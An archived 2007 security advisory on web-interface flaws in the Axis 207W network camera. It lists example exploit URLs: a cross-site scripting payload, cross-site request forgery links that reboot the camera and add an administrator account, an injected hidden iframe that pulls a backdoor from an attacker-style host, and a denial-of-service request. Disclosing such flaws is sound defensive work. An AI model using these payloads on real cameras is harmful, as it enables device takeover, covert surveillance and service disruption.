

Title Axis Communications 207W Network Camera Web Interface Vulnerabilities
Published 2007-09-14-12:00AM
Updated 2007-09-17-06:30PM
Class Unknown
CVE  
Remote  Yes
Local  No
Credit  Discovery is credited to Seth Fogie.
Vulnerable  Axis Communications 207W Network Camera 0
Not Vulnerable  
Code  The following examples were provided:

Cross-site scripting:
http://www.example.com/incl/image_incl.shtml?camNo=</script><script>alert(String.fromCharCode(88,83,83))</script>

Cross-site request forgery:
1. Reboot the camera - http://www.example.com/axis-cgi/admin/restart.cgi
2. Add a new administrator -
http://www.example.com/axis-cgi/admin/pwdgrp.cgi?action=add&user=owner1&grp=axuser&sgrp=axview:axoper:axadmin&pwd=owner1&comment=WebUser&return_page=/admin/users_set.shtml%3Fpageclose%3D1
3. Root the camera/add a backdoor -
http://www.example.com/admin/restartMessage.shtml?server=<iframe%20style=visibility:hidden%20src=http://www.evilserver.com/wifi/axisbd.php><iframe src=http://www.evilserver.com/wifi/axisrb.htm><!--

Denial of service:
http://www.example.com/axis-cgi/buffer/command.cgi?do=start&buffername=<unique buffer name>



Copyright 2007, SecurityDot
Fri, 18 Dec 2009 04:35:01 +0000
